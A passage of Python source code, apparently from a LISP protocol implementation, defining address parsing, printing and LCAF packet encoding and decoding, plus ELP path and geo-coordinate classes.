# left. If the high-order bit hits bit 127, then it shifts it another 8 bits.
# This causes IPv6 addresses to lose their high-order byte. So note the check
# for shift >= 120 below.
#
class lisp_address(object):
def __init__(self, afi, addr_str, mask_len, iid):
self.afi = afi
self.mask_len = mask_len
self.instance_id = iid
self.iid_list = []
self.address = 0
if (addr_str != ""): self.store_address(addr_str)
#enddef
def copy_address(self, addr):
if (addr == None): return
self.afi = addr.afi
self.address = addr.address
self.mask_len = addr.mask_len
self.instance_id = addr.instance_id
self.iid_list = addr.iid_list
#enddef
def make_default_route(self, addr):
self.afi = addr.afi
self.instance_id = addr.instance_id
self.mask_len = 0
self.address = 0
#enddef
def make_default_multicast_route(self, addr):
self.afi = addr.afi
self.instance_id = addr.instance_id
if (self.afi == LISP_AFI_IPV4):
self.address = 0xe0000000
self.mask_len = 4
#endif
if (self.afi == LISP_AFI_IPV6):
self.address = 0xff << 120
self.mask_len = 8
#endif
if (self.afi == LISP_AFI_MAC):
self.address = 0xffffffffffff
self.mask_len = 48
#endif
#enddef
def not_set(self):
return(self.afi == LISP_AFI_NONE)
#enddef
def is_private_address(self):
if (self.is_ipv4() == False): return(False)
addr = self.address
if (((addr & 0xff000000) >> 24) == 10): return(True)
if (((addr & 0xff000000) >> 24) == 172):
byte2 = (addr & 0x00ff0000) >> 16
if (byte2 >= 16 and byte2 <= 31): return(True)
#endif
if (((addr & 0xffff0000) >> 16) == 0xc0a8): return(True)
return(False)
#enddef
def is_multicast_address(self):
if (self.is_ipv4()): return(self.is_ipv4_multicast())
if (self.is_ipv6()): return(self.is_ipv6_multicast())
if (self.is_mac()): return(self.is_mac_multicast())
return(False)
#enddef
def host_mask_len(self):
if (self.afi == LISP_AFI_IPV4): return(LISP_IPV4_HOST_MASK_LEN)
if (self.afi == LISP_AFI_IPV6): return(LISP_IPV6_HOST_MASK_LEN)
if (self.afi == LISP_AFI_MAC): return(LISP_MAC_HOST_MASK_LEN)
if (self.afi == LISP_AFI_E164): return(LISP_E164_HOST_MASK_LEN)
if (self.afi == LISP_AFI_NAME): return(len(self.address) * 8)
if (self.afi == LISP_AFI_GEO_COORD):
return(len(self.address.print_geo()) * 8)
#endif
return(0)
#enddef
def is_iana_eid(self):
if (self.is_ipv6() == False): return(False)
addr = self.address >> 96
return(addr == 0x20010005)
#enddef
def addr_length(self):
if (self.afi == LISP_AFI_IPV4): return(4)
if (self.afi == LISP_AFI_IPV6): return(16)
if (self.afi == LISP_AFI_MAC): return(6)
if (self.afi == LISP_AFI_E164): return(8)
if (self.afi == LISP_AFI_LCAF): return(0)
if (self.afi == LISP_AFI_NAME): return(len(self.address) + 1)
if (self.afi == LISP_AFI_IID_RANGE): return(4)
if (self.afi == LISP_AFI_GEO_COORD):
return(len(self.address.print_geo()))
#endif
return(0)
#enddef
def afi_to_version(self):
if (self.afi == LISP_AFI_IPV4): return(4)
if (self.afi == LISP_AFI_IPV6): return(6)
return(0)
#enddef
def packet_format(self):
#
# Note that "I" is used to produce 4 bytes because when "L" is used,
# it was producing 8 bytes in struct.pack().
#
if (self.afi == LISP_AFI_IPV4): return("I")
if (self.afi == LISP_AFI_IPV6): return("QQ")
if (self.afi == LISP_AFI_MAC): return("HHH")
if (self.afi == LISP_AFI_E164): return("II")
if (self.afi == LISP_AFI_LCAF): return("I")
return("")
#enddef
def pack_address(self):
packet_format = self.packet_format()
packet = b""
if (self.is_ipv4()):
packet = struct.pack(packet_format, socket.htonl(self.address))
elif (self.is_ipv6()):
addr1 = byte_swap_64(self.address >> 64)
addr2 = byte_swap_64(self.address & 0xffffffffffffffff)
packet = struct.pack(packet_format, addr1, addr2)
elif (self.is_mac()):
addr = self.address
addr1 = (addr >> 32) & 0xffff
addr2 = (addr >> 16) & 0xffff
addr3 = addr & 0xffff
packet = struct.pack(packet_format, addr1, addr2, addr3)
elif (self.is_e164()):
addr = self.address
addr1 = (addr >> 32) & 0xffffffff
addr2 = (addr & 0xffffffff)
packet = struct.pack(packet_format, addr1, addr2)
elif (self.is_dist_name()):
packet += (self.address + "\0").encode()
#endif
return(packet)
#enddef
def unpack_address(self, packet):
packet_format = self.packet_format()
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
addr = struct.unpack(packet_format, packet[:format_size])
if (self.is_ipv4()):
self.address = socket.ntohl(addr[0])
elif (self.is_ipv6()):
#
# Sigh, we have a high-order byte with zero-fill issue when
# parsing a binary IPv6 address from a packet. If we have an
# address that starts with fe::, then addr[0] is one byte in
# length and byte-swapping is not necessary (or we would make
# the high-order 16 bits 00fe). Sigh.
#
if (addr[0] <= 0xffff and (addr[0] & 0xff) == 0):
high = (addr[0] << 48) << 64
else:
high = byte_swap_64(addr[0]) << 64
#endif
low = byte_swap_64(addr[1])
self.address = high | low
elif (self.is_mac()):
short1 = addr[0]
short2 = addr[1]
short3 = addr[2]
self.address = (short1 << 32) + (short2 << 16) + short3
elif (self.is_e164()):
self.address = (addr[0] << 32) + addr[1]
elif (self.is_dist_name()):
packet, self.address = lisp_decode_dist_name(packet)
self.mask_len = len(self.address) * 8
format_size = 0
#endif
packet = packet[format_size::]
return(packet)
#enddef
def is_ipv4(self):
return(True if (self.afi == LISP_AFI_IPV4) else False)
#enddef
def is_ipv4_link_local(self):
if (self.is_ipv4() == False): return(False)
return(((self.address >> 16) & 0xffff) == 0xa9fe)
#enddef
def is_ipv4_loopback(self):
if (self.is_ipv4() == False): return(False)
return(self.address == 0x7f000001)
#enddef
def is_ipv4_multicast(self):
if (self.is_ipv4() == False): return(False)
return(((self.address >> 24) & 0xf0) == 0xe0)
#enddef
def is_ipv4_string(self, addr_str):
return(addr_str.find(".") != -1)
#enddef
def is_ipv6(self):
return(True if (self.afi == LISP_AFI_IPV6) else False)
#enddef
def is_ipv6_link_local(self):
if (self.is_ipv6() == False): return(False)
return(((self.address >> 112) & 0xffff) == 0xfe80)
#enddef
def is_ipv6_string_link_local(self, addr_str):
return(addr_str.find("fe80::") != -1)
#enddef
def is_ipv6_loopback(self):
if (self.is_ipv6() == False): return(False)
return(self.address == 1)
#enddef
def is_ipv6_multicast(self):
if (self.is_ipv6() == False): return(False)
return(((self.address >> 120) & 0xff) == 0xff)
#enddef
def is_ipv6_string(self, addr_str):
return(addr_str.find(":") != -1)
#enddef
def is_mac(self):
return(True if (self.afi == LISP_AFI_MAC) else False)
#enddef
def is_mac_multicast(self):
if (self.is_mac() == False): return(False)
return((self.address & 0x010000000000) != 0)
#enddef
def is_mac_broadcast(self):
if (self.is_mac() == False): return(False)
return(self.address == 0xffffffffffff)
#enddef
def is_mac_string(self, addr_str):
return(len(addr_str) == 15 and addr_str.find("-") != -1)
#enddef
def is_link_local_multicast(self):
if (self.is_ipv4()):
return((0xe0ffff00 & self.address) == 0xe0000000)
#endif
if (self.is_ipv6()):
return((self.address >> 112) & 0xffff == 0xff02)
#endif
return(False)
#enddef
def is_null(self):
return(True if (self.afi == LISP_AFI_NONE) else False)
#enddef
def is_ultimate_root(self):
return(True if self.afi == LISP_AFI_ULTIMATE_ROOT else False)
#enddef
def is_iid_range(self):
return(True if self.afi == LISP_AFI_IID_RANGE else False)
#enddef
def is_e164(self):
return(True if (self.afi == LISP_AFI_E164) else False)
#enddef
def is_dist_name(self):
return(True if (self.afi == LISP_AFI_NAME) else False)
#enddef
def is_geo_prefix(self):
return(True if (self.afi == LISP_AFI_GEO_COORD) else False)
#enddef
def is_binary(self):
if (self.is_dist_name()): return(False)
if (self.is_geo_prefix()): return(False)
return(True)
#enddef
def store_address(self, addr_str):
if (self.afi == LISP_AFI_NONE): self.string_to_afi(addr_str)
#
# Parse instance-id.
#
i = addr_str.find("[")
j = addr_str.find("]")
if (i != -1 and j != -1):
self.instance_id = int(addr_str[i+1:j])
addr_str = addr_str[j+1::]
if (self.is_dist_name() == False):
addr_str = addr_str.replace(" ", "")
#endif
#endif
#
# Parse AFI based address.
#
if (self.is_ipv4()):
octet = addr_str.split(".")
value = int(octet[0]) << 24
value += int(octet[1]) << 16
value += int(octet[2]) << 8
value += int(octet[3])
self.address = value
elif (self.is_ipv6()):
#
# There will be a common IPv6 address input mistake that will
# occur. The address ff::/8 (or an address ff::1) is actually
# encoded as 0x00ff as the high-order 16-bits. The correct way to
# specify the prefix is ff00::/8 but one would wonder why the
# lower order 0x00 bits are needed if a /8 is used. So to
# summarize:
#
# Entering ff::/8 will give you the 0::/8 prefix.
# Entering ff00::/8 is not the same as ff00::/16.
#
# Allow user to specify ff::/8 which allows for placing the the
# byte in the high-order byte of the 128-bit quantity. Check
# for double-colon in the input string to detect the single byte
# and then below byte-swap the first 2-bytes.
#
odd_byte = (addr_str[2:4] == "::")
try:
addr_str = socket.inet_pton(socket.AF_INET6, addr_str)
except:
addr_str = socket.inet_pton(socket.AF_INET6, "0::0")
#endtry
addr_str = binascii.hexlify(addr_str)
if (odd_byte):
addr_str = addr_str[2:4] + addr_str[0:2] + addr_str[4::]
#endif
self.address = int(addr_str, 16)
elif (self.is_geo_prefix()):
geo = lisp_geo(None)
geo.name = "geo-prefix-{}".format(geo)
geo.parse_geo_string(addr_str)
self.address = geo
elif (self.is_mac()):
addr_str = addr_str.replace("-", "")
value = int(addr_str, 16)
self.address = value
elif (self.is_e164()):
addr_str = addr_str[1::]
value = int(addr_str, 16)
self.address = value << 4
elif (self.is_dist_name()):
self.address = addr_str.replace("'", "")
#endif
self.mask_len = self.host_mask_len()
#enddef
def store_prefix(self, prefix_str):
if (self.is_geo_string(prefix_str)):
index = prefix_str.find("]")
mask_len = len(prefix_str[index+1::]) * 8
elif (prefix_str.find("/") != -1):
prefix_str, mask_len = prefix_str.split("/")
else:
left = prefix_str.find("'")
if (left == -1): return
right = prefix_str.find("'", left+1)
if (right == -1): return
mask_len = len(prefix_str[left+1:right]) * 8
#endif
self.string_to_afi(prefix_str)
self.store_address(prefix_str)
self.mask_len = int(mask_len)
#enddef
def zero_host_bits(self):
if (self.mask_len < 0): return
mask = (2 ** self.mask_len) - 1
shift = self.addr_length() * 8 - self.mask_len
mask <<= shift
self.address &= mask
#enddef
def is_geo_string(self, addr_str):
index = addr_str.find("]")
if (index != -1): addr_str = addr_str[index+1::]
geo = addr_str.split("/")
if (len(geo) == 2):
if (geo[1].isdigit() == False): return(False)
#endif
geo = geo[0]
geo = geo.split("-")
geo_len = len(geo)
if (geo_len < 8 or geo_len > 9): return(False)
for num in range(0, geo_len):
if (num == 3):
if (geo[num] in ["N", "S"]): continue
return(False)
#enif
if (num == 7):
if (geo[num] in ["W", "E"]): continue
return(False)
#endif
if (geo[num].isdigit() == False): return(False)
#endfor
return(True)
#enddef
def string_to_afi(self, addr_str):
if (addr_str.count("'") == 2):
self.afi = LISP_AFI_NAME
return
#endif
if (addr_str.find(":") != -1): self.afi = LISP_AFI_IPV6
elif (addr_str.find(".") != -1): self.afi = LISP_AFI_IPV4
elif (addr_str.find("+") != -1): self.afi = LISP_AFI_E164
elif (self.is_geo_string(addr_str)): self.afi = LISP_AFI_GEO_COORD
elif (addr_str.find("-") != -1): self.afi = LISP_AFI_MAC
else: self.afi = LISP_AFI_NONE
#enddef
def print_address(self):
addr = self.print_address_no_iid()
iid = "[" + str(self.instance_id)
for i in self.iid_list: iid += "," + str(i)
iid += "]"
addr = "{}{}".format(iid, addr)
return(addr)
#enddef
def print_address_no_iid(self):
if (self.is_ipv4()):
addr = self.address
value1 = addr >> 24
value2 = (addr >> 16) & 0xff
value3 = (addr >> 8) & 0xff
value4 = addr & 0xff
return("{}.{}.{}.{}".format(value1, value2, value3, value4))
elif (self.is_ipv6()):
addr_str = lisp_hex_string(self.address).zfill(32)
addr_str = binascii.unhexlify(addr_str)
addr_str = socket.inet_ntop(socket.AF_INET6, addr_str)
return("{}".format(addr_str))
elif (self.is_geo_prefix()):
return("{}".format(self.address.print_geo()))
elif (self.is_mac()):
addr_str = lisp_hex_string(self.address).zfill(12)
addr_str = "{}-{}-{}".format(addr_str[0:4], addr_str[4:8],
addr_str[8:12])
return("{}".format(addr_str))
elif (self.is_e164()):
addr_str = lisp_hex_string(self.address).zfill(15)
return("+{}".format(addr_str))
elif (self.is_dist_name()):
return("'{}'".format(self.address))
elif (self.is_null()):
return("no-address")
#endif
return("unknown-afi:{}".format(self.afi))
#enddef
def print_prefix(self):
if (self.is_ultimate_root()): return("[*]")
if (self.is_iid_range()):
if (self.mask_len == 32): return("[{}]".format(self.instance_id))
upper = self.instance_id + (2**(32 - self.mask_len) - 1)
return("[{}-{}]".format(self.instance_id, upper))
#endif
addr = self.print_address()
if (self.is_dist_name()): return(addr)
if (self.is_geo_prefix()): return(addr)
index = addr.find("no-address")
if (index == -1):
addr = "{}/{}".format(addr, str(self.mask_len))
else:
addr = addr[0:index]
#endif
return(addr)
#enddef
def print_prefix_no_iid(self):
addr = self.print_address_no_iid()
if (self.is_dist_name()): return(addr)
if (self.is_geo_prefix()): return(addr)
return("{}/{}".format(addr, str(self.mask_len)))
#enddef
def print_prefix_url(self):
if (self.is_ultimate_root()): return("0--0")
addr = self.print_address()
index = addr.find("]")
if (index != -1): addr = addr[index+1::]
if (self.is_geo_prefix()):
addr = addr.replace("/", "-")
return("{}-{}".format(self.instance_id, addr))
#endif
return("{}-{}-{}".format(self.instance_id, addr, self.mask_len))
#enddef
def print_sg(self, g):
s = self.print_prefix()
si = s.find("]") + 1
g = g.print_prefix()
gi = g.find("]") + 1
sg_str = "[{}]({}, {})".format(self.instance_id, s[si::], g[gi::])
return(sg_str)
#enddef
def hash_address(self, addr):
addr1 = self.address
addr2 = addr.address
if (self.is_geo_prefix()): addr1 = self.address.print_geo()
if (addr.is_geo_prefix()): addr2 = addr.address.print_geo()
if (type(addr1) == str):
addr1 = int(binascii.hexlify(addr1[0:1]))
#endif
if (type(addr2) == str):
addr2 = int(binascii.hexlify(addr2[0:1]))
#endif
return(addr1 ^ addr2)
#enddef
#
# Is self more specific or equal to the prefix supplied in variable
# 'prefix'. Return True if so.
#
def is_more_specific(self, prefix):
if (prefix.afi == LISP_AFI_ULTIMATE_ROOT): return(True)
mask_len = prefix.mask_len
if (prefix.afi == LISP_AFI_IID_RANGE):
size = 2**(32 - mask_len)
lower = prefix.instance_id
upper = lower + size
return(self.instance_id in range(lower, upper))
#endif
if (self.instance_id != prefix.instance_id): return(False)
if (self.afi != prefix.afi):
if (prefix.afi != LISP_AFI_NONE): return(False)
#endif
#
# Handle string addresses like distinguished names and geo-prefixes.
#
if (self.is_binary() == False):
if (prefix.afi == LISP_AFI_NONE): return(True)
if (type(self.address) != type(prefix.address)): return(False)
addr = self.address
paddr = prefix.address
if (self.is_geo_prefix()):
addr = self.address.print_geo()
paddr = prefix.address.print_geo()
#endif
if (len(addr) < len(paddr)): return(False)
return(addr.find(paddr) == 0)
#endif
#
# Handle numeric addresses.
#
if (self.mask_len < mask_len): return(False)
shift = (prefix.addr_length() * 8) - mask_len
mask = (2**mask_len - 1) << shift
return((self.address & mask) == prefix.address)
#enddef
def mask_address(self, mask_len):
shift = (self.addr_length() * 8) - mask_len
mask = (2**mask_len - 1) << shift
self.address &= mask
#enddef
def is_exact_match(self, prefix):
if (self.instance_id != prefix.instance_id): return(False)
p1 = self.print_prefix()
p2 = prefix.print_prefix() if prefix else ""
return(p1 == p2)
#enddef
def is_local(self):
if (self.is_ipv4()):
local = lisp_myrlocs[0]
if (local == None): return(False)
local = local.print_address_no_iid()
return(self.print_address_no_iid() == local)
#endif
if (self.is_ipv6()):
local = lisp_myrlocs[1]
if (local == None): return(False)
local = local.print_address_no_iid()
return(self.print_address_no_iid() == local)
#endif
return(False)
#enddef
def store_iid_range(self, iid, mask_len):
if (self.afi == LISP_AFI_NONE):
if (iid == 0 and mask_len == 0): self.afi = LISP_AFI_ULTIMATE_ROOT
else: self.afi = LISP_AFI_IID_RANGE
#endif
self.instance_id = iid
self.mask_len = mask_len
#enddef
def lcaf_length(self, lcaf_type):
length = self.addr_length() + 2
if (lcaf_type == LISP_LCAF_AFI_LIST_TYPE): length += 4
if (lcaf_type == LISP_LCAF_INSTANCE_ID_TYPE): length += 4
if (lcaf_type == LISP_LCAF_ASN_TYPE): length += 4
if (lcaf_type == LISP_LCAF_APP_DATA_TYPE): length += 8
if (lcaf_type == LISP_LCAF_GEO_COORD_TYPE): length += 12
if (lcaf_type == LISP_LCAF_OPAQUE_TYPE): length += 0
if (lcaf_type == LISP_LCAF_NAT_TYPE): length += 4
if (lcaf_type == LISP_LCAF_NONCE_LOC_TYPE): length += 4
if (lcaf_type == LISP_LCAF_MCAST_INFO_TYPE): length = length * 2 + 8
if (lcaf_type == LISP_LCAF_ELP_TYPE): length += 0
if (lcaf_type == LISP_LCAF_SECURITY_TYPE): length += 6
if (lcaf_type == LISP_LCAF_SOURCE_DEST_TYPE): length += 4
if (lcaf_type == LISP_LCAF_RLE_TYPE): length += 4
return(length)
#enddef
#
# Instance ID LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 2 | IID mask-len | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lcaf_encode_iid(self):
lcaf_type = LISP_LCAF_INSTANCE_ID_TYPE
addr_length = socket.htons(self.lcaf_length(lcaf_type))
iid = self.instance_id
afi = self.afi
ml = 0
if (afi < 0):
if (self.afi == LISP_AFI_GEO_COORD):
afi = LISP_AFI_LCAF
ml = 0
else:
afi = 0
ml = self.mask_len
#endif
#endif
lcaf = struct.pack("BBBBH", 0, 0, lcaf_type, ml, addr_length)
lcaf += struct.pack("IH", socket.htonl(iid), socket.htons(afi))
if (afi == 0): return(lcaf)
if (self.afi == LISP_AFI_GEO_COORD):
lcaf = lcaf[0:-2]
lcaf += self.address.encode_geo()
return(lcaf)
#endif
lcaf += self.pack_address()
return(lcaf)
#enddef
def lcaf_decode_iid(self, packet):
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
x, y, lcaf_type, iid_ml, length = struct.unpack(packet_format,
packet[:format_size])
packet = packet[format_size::]
if (lcaf_type != LISP_LCAF_INSTANCE_ID_TYPE): return(None)
packet_format = "IH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
iid, afi = struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
length = socket.ntohs(length)
self.instance_id = socket.ntohl(iid)
afi = socket.ntohs(afi)
self.afi = afi
if (iid_ml != 0 and afi == 0): self.mask_len = iid_ml
if (afi == 0):
self.afi = LISP_AFI_IID_RANGE if iid_ml else LISP_AFI_ULTIMATE_ROOT
#endif
#
# No address encoded.
#
if (afi == 0): return(packet)
#
# Look for distinguished-name.
#
if (self.is_dist_name()):
packet, self.address = lisp_decode_dist_name(packet)
self.mask_len = len(self.address) * 8
return(packet)
#endif
#
# Only process geo-prefixes inside of an LCAF encoded Instance-ID type.
#
if (afi == LISP_AFI_LCAF):
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
struct.unpack(packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_GEO_COORD_TYPE): return(None)
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
if (lcaf_len > len(packet)): return(None)
geo = lisp_geo("")
self.afi = LISP_AFI_GEO_COORD
self.address = geo
packet = geo.decode_geo(packet, lcaf_len, rsvd2)
self.mask_len = self.host_mask_len()
return(packet)
#endif
addr_length = self.addr_length()
if (len(packet) < addr_length): return(None)
packet = self.unpack_address(packet)
return(packet)
#enddef
#
# Multicast Info Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 9 | Rsvd2 |R|L|J| 8 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance-ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reserved | Source MaskLen| Group MaskLen |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Source/Subnet Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Group Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lcaf_encode_sg(self, group):
lcaf_type = LISP_LCAF_MCAST_INFO_TYPE
iid = socket.htonl(self.instance_id)
addr_length = socket.htons(self.lcaf_length(lcaf_type))
lcaf = struct.pack("BBBBHIHBB", 0, 0, lcaf_type, 0, addr_length, iid,
0, self.mask_len, group.mask_len)
lcaf += struct.pack("H", socket.htons(self.afi))
lcaf += self.pack_address()
lcaf += struct.pack("H", socket.htons(group.afi))
lcaf += group.pack_address()
return(lcaf)
#enddef
def lcaf_decode_sg(self, packet):
packet_format = "BBBBHIHBB"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
x, y, lcaf_type, rsvd, length, iid, z, sml, gml = \
struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
if (lcaf_type != LISP_LCAF_MCAST_INFO_TYPE): return([None, None])
self.instance_id = socket.ntohl(iid)
length = socket.ntohs(length) - 8
#
# Get AFI and source address. Validate if enough length and there
# are bytes in the packet.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
if (length < format_size): return([None, None])
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
length -= format_size
self.afi = socket.ntohs(afi)
self.mask_len = sml
addr_length = self.addr_length()
if (length < addr_length): return([None, None])
packet = self.unpack_address(packet)
if (packet == None): return([None, None])
length -= addr_length
#
# Get AFI and source address. Validate if enough length and there
# are bytes in the packet.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
if (length < format_size): return([None, None])
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
length -= format_size
group = lisp_address(LISP_AFI_NONE, "", 0, 0)
group.afi = socket.ntohs(afi)
group.mask_len = gml
group.instance_id = self.instance_id
addr_length = self.addr_length()
if (length < addr_length): return([None, None])
packet = group.unpack_address(packet)
if (packet == None): return([None, None])
return([packet, group])
#enddef
def lcaf_decode_eid(self, packet):
packet_format = "BBB"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
#
# Do not advance packet pointer. The specific LCAF decoders will do
# it themselves.
#
rsvd, flags, lcaf_type = struct.unpack(packet_format,
packet[:format_size])
if (lcaf_type == LISP_LCAF_INSTANCE_ID_TYPE):
return([self.lcaf_decode_iid(packet), None])
elif (lcaf_type == LISP_LCAF_MCAST_INFO_TYPE):
packet, group = self.lcaf_decode_sg(packet)
return([packet, group])
elif (lcaf_type == LISP_LCAF_GEO_COORD_TYPE):
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
struct.unpack(packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_GEO_COORD_TYPE): return(None)
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
if (lcaf_len > len(packet)): return(None)
geo = lisp_geo("")
self.instance_id = 0
self.afi = LISP_AFI_GEO_COORD
self.address = geo
packet = geo.decode_geo(packet, lcaf_len, rsvd2)
self.mask_len = self.host_mask_len()
#endif
return([packet, None])
#enddef
#endclass
#
# Data structure for storing learned or configured ELPs.
#
class lisp_elp_node(object):
def __init__(self):
self.address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.probe = False
self.strict = False
self.eid = False
self.we_are_last = False
#enddef
def copy_elp_node(self):
elp_node = lisp_elp_node()
elp_node.copy_address(self.address)
elp_node.probe = self.probe
elp_node.strict = self.strict
elp_node.eid = self.eid
elp_node.we_are_last = self.we_are_last
return(elp_node)
#enddef
#endclass
class lisp_elp(object):
def __init__(self, name):
self.elp_name = name
self.elp_nodes = []
self.use_elp_node = None
self.we_are_last = False
#enddef
def copy_elp(self):
elp = lisp_elp(self.elp_name)
elp.use_elp_node = self.use_elp_node
elp.we_are_last = self.we_are_last
for elp_node in self.elp_nodes:
elp.elp_nodes.append(elp_node.copy_elp_node())
#endfor
return(elp)
#enddef
def print_elp(self, want_marker):
elp_str = ""
for elp_node in self.elp_nodes:
use_or_last = ""
if (want_marker):
if (elp_node == self.use_elp_node):
use_or_last = "*"
elif (elp_node.we_are_last):
use_or_last = "x"
#endif
#endif
elp_str += "{}{}({}{}{}), ".format(use_or_last,
elp_node.address.print_address_no_iid(),
"r" if elp_node.eid else "R", "P" if elp_node.probe else "p",
"S" if elp_node.strict else "s")
#endfor
return(elp_str[0:-2] if elp_str != "" else "")
#enddef
def select_elp_node(self):
v4, v6, device = lisp_myrlocs
index = None
for elp_node in self.elp_nodes:
if (v4 and elp_node.address.is_exact_match(v4)):
index = self.elp_nodes.index(elp_node)
break
#endif
if (v6 and elp_node.address.is_exact_match(v6)):
index = self.elp_nodes.index(elp_node)
break
#endif
#endfor
#
# If we did not find a match, this is possibly an ITR. We need to give
# if the first ELP node.
#
if (index == None):
self.use_elp_node = self.elp_nodes[0]
elp_node.we_are_last = False
return
#endif
#
# If we matched the last item in the ELP nodes, we are the end of the
# path. Flag it for display purposes and return None.
#
if (self.elp_nodes[-1] == self.elp_nodes[index]):
self.use_elp_node = None
elp_node.we_are_last = True
return
#endif
#
# Return the next node after the one that matches this system.
#
self.use_elp_node = self.elp_nodes[index+1]
return
#enddef
#endclass
class lisp_geo(object):
def __init__(self, name):
self.geo_name = name
self.latitude = 0xffffffff # Negative when North, otherwise South
self.lat_mins = 0
self.lat_secs = 0
self.longitude = 0xffffffff # Negative when East, otherwise West
self.long_mins = 0
self.long_secs = 0
self.altitude = -1
self.radius = 0
#enddef
def copy_geo(self):
geo = lisp_geo(self.geo_name)
geo.latitude = self.latitude
geo.lat_mins = self.lat_mins
geo.lat_secs = self.lat_secs
geo.longitude = self.longitude
geo.long_mins = self.long_mins
geo.long_secs = self.long_secs
geo.altitude = self.altitude
geo.radius = self.radius
return(geo)
#enddef
def no_geo_altitude(self):
return(self.altitude == -1)
#enddef
def parse_geo_string(self, geo_str):
index = geo_str.find("]")
if (index != -1): geo_str = geo_str[index+1::]
#
# Check if radius is specified. That is a geo-prefix and not just a
# geo-point.
#
if (geo_str.find("/") != -1):
geo_str, radius = geo_str.split("/")
self.radius = int(radius)
#endif
geo_str = geo_str.split("-")
if (len(geo_str) < 8): return(False)
latitude = geo_str[0:4]
longitude = geo_str[4:8]
#
# Get optional altitude.
#
if (len(geo_str) > 8): self.altitude = int(geo_str[8])
#
# Get latitude values.
#
self.latitude = int(latitude[0])
self.lat_mins = int(latitude[1])
self.lat_secs = int(latitude[2])
if (latitude[3] == "N"): self.latitude = -self.latitude
#
# Get longitude values.
#
self.longitude = int(longitude[0])
self.long_mins = int(longitude[1])
self.long_secs = int(longitude[2])
if (longitude[3] == "E"): self.longitude = -self.longitude
return(True)
#enddef
def print_geo(self):
n_or_s = "N" if self.latitude < 0 else "S"
e_or_w = "E" if self.longitude < 0 else "W"
geo_str = "{}-{}-{}-{}-{}-{}-{}-{}".format(abs(self.latitude),
self.lat_mins, self.lat_secs, n_or_s, abs(self.longitude),
self.long_mins, self.long_secs, e_or_w)
if (self.no_geo_altitude() == False):
geo_str += "-" + str(self.altitude)
#endif
#
# Print "/<radius>" if not 0.
#
if (self.radius != 0): geo_str += "/{}".format(self.radius)
return(geo_str)
#enddef
def geo_url(self):
zoom = os.getenv("LISP_GEO_ZOOM_LEVEL")
zoom = "10" if (zoom == "" or zoom.isdigit() == False) else zoom
lat, lon = self.dms_to_decimal()
url = ("http://maps.googleapis.com/maps/api/staticmap?center={},{}" + \
"&markers=color:blue%7Clabel:lisp%7C{},{}" + \
"&zoom={}&size=1024x1024&sensor=false").format(lat, lon, lat, lon,
zoom)
return(url)
#enddef
def print_geo_url(self):
geo = self.print_geo()
if (self.radius == 0):
url = self.geo_url()
string = "<a href='{}'>{}</a>".format(url, geo)
else:
url = geo.replace("/", "-")
string = "<a href='/lisp/geo-map/{}'>{}</a>".format(url, geo)
#endif
return(string)
#enddef
def dms_to_decimal(self):
degs, mins, secs = self.latitude, self.lat_mins, self.lat_secs
dd = float(abs(degs))
